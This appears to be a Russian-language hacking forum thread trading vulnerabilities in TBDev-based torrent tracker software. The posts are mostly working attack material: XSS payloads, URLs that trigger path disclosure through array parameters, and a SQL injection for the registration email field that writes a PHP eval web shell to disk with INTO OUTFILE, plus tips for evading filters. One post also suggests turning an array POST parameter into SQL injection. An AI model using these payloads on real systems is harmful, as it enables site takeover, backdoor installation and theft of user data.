насколько я помню речь шла не о каком-то коде взятом из головы, а именно из usersearch.php, а там все в "" пример: PHP: value="<?=$_GET['ip']?>" поэтому будет не так : Code: <table name=1 onMouseOver=alert(/aaa/)><tr><td>test</td></tr></table> а так: Code: <table name="1 onMouseOver=alert(/aaa/)"><tr><td>test</td></tr></table> и я не соглашусь с тобой, что этот код вреден.
Kpeamop, я и написал что как хот-фикс он подойдёт, для конкретно этого файла. Но если в нём что нибудь поменяют, этот код может перестать защищать. И само собой, в общем случае, на такой код полагаться нельзя. З.Ы. К слову, в TBDev мест где в тегах не используются кавычки - *опой жуй.
+ -> не эффективно два - у тебя хрень такая - name="something[]" и так несколько чекбоксов - на выходе этого МАССИВА НЕ БУДЕТ
Ребят, хватит юну мучать, он прекрасно знает, где и какие дырки. Давайте меня помучайте: http://dev.kinokpk.com/releases/Kinokpk.com_releaser_v.2.70.7z
КЫСС (XSS) PHP: <form action="<?=$PHP_SELF;?>" method="get" name="form1"> http://127.0.0.1/treker/formats.php/%22%3E%3Cscript%3Ealert(/hi/);%3C/script%3E
что можно сделать если есть доступ к директорскому аку но нету доступа к админке (к блокам) как можно шелл залить?
Если у юзера в mysql есть права на запись,то в регистрации например вместо email вписываешь Code: '+union+select+'<? eval($a); ?>'+into+otfile+'C:/blablabla/1.php'/* Вместо eval можно окно для загрузки,кто-то выкладывал вроде. Вместо blablabla пишешь путь который тебе нужен,взять можно из ошибки. Например Или в начале темы там выкладывали раскрытия путей. У меня было один раз что "+" не катил,заменял на /**/.Так же если комментарий "/*" не катит,заменяй на -- или #
тема тухнет ,вроде небыло этого раскрытия путей ))) http://127.0.0.1/treker/log.php?type[]= http://127.0.0.1/treker/friends.php?action=delete&type[]=&targetid=2 http://127.0.0.1/treker/browse.php?search[]=&incldead=0&cat=0 какие баян напишите плиз =) а то все 21 страниц заново смареть лень
С форумом простились, аминь! Мелкие пакости правки, и прочее прочее прочее: 1. Переведены языковые файлики на ArrayAccess. 2. Блокировка скрипта если включен regsiter_globals или не забитыми всяким хламом переменными 3. Привязка кукисов к подсети 255.255.0.0 4. Еще всякие мелочки, кому надо - diff в помощь http://bit-torrent.kiev.ua/downloads.php?do=file&id=25
Собственно,понятия не имею было,или небыло,но когда рылся в коде дивжка,для самообразования,нашол: PHP: http://target.com/rss.php?feed=dl&cat=31&passkey[]= Раскрытие путей.
И еще,незнаю будет ли работать гдето еще,ибо нет желания тестировать,но трекеры в моей локальной сети точно подвержены: PHP: http://good73.net/getrss.php При нажатии сабмита имеем POST данные: PHP: cat%5B%5D=22&cat%5B%5D=20&cat%5B%5D=12&feed=web&login=passkey Так вот,если просто повторить запрос,использовав при этом urlencode()(как в примере),получим раскрытие путей: PHP: Warning: implode() [function.implode]: Invalid arguments passed in /usr/local/www/target.com/getrss.php on line 56
Извиняюсь что в несколько постов,просто в данный момент пишу с нетбука,который очень меня напрягает. Все знают,про такую кнопку как "Спасибо",так вот,сабмитим ее,и имеем POST-данные вида: PHP: torrentid=33042&ajax=yes Создаем в качестве ajax,массив,с темже именем,то есть: PHP: torrentid=33042&ajax[]=yes Меня выкидывало на ошибку MySQL.Незнаю,возможно есть шанс раскрутить в скулю,но я в этом не силен.Это я оставлю на ваш тест
